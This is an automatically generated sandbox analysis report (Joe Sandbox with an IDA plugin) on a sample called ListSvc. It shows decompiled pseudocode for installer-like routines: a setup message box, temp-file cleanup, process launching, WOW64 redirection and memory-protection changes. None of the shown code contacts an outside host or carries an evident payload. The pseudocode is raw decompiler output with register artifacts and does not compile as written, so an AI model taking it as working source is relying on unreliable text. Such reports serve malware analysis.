Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789

Uniqueness

Uniqueness Score: -1.00%

Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4d4828
					_t15 = _t37 + 0x14; // 0x16b0bd
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4d4828
					_t16 = _t44 + 0x18; // 0x301c00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4d4828
					_t17 = _t47 + 0x18; // 0x301c00
					_t86 =  *0x4c1de0; // 0x7fba0010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4d4828
					_t18 = _t55 + 0x18; // 0x301c00
					_t56 =  *0x4c1de4; // 0x215ab00
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x215ab00
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x50392
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}

APIs

MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179

Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE

RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
DestroyWindow.USER32(00050392,004B6554), ref: 004B6514

Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200

Strings

.tmp, xrefs: 004B61BF
0MB, xrefs: 004B6281
(HM, xrefs: 004B61F8, 004B624A, 004B625C, 004B62AC

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
String ID: (HM$.tmp$0MB
API String ID: 3858953238-3529996390
Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}

APIs

CreateProcessW.KERNEL32 ref: 004AF798
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
GetExitCodeProcess.KERNEL32 ref: 004AF7DB
CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4

Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F

Strings

D, xrefs: 004AF772

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D

Uniqueness

Uniqueness Score: -1.00%

Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B

Strings

Wow64RevertWow64FsRedirection, xrefs: 004B5ACE
kernel32.dll, xrefs: 004B5AB9, 004B5AD3
Wow64DisableWow64FsRedirection, xrefs: 004B5AB4
shell32.dll, xrefs: 004B5B1B

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x214a9d0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x214a9d0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x214a9f0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

APIs

Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}

APIs

GetSystemInfo.KERNEL32(?), ref: 004AF92F
VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

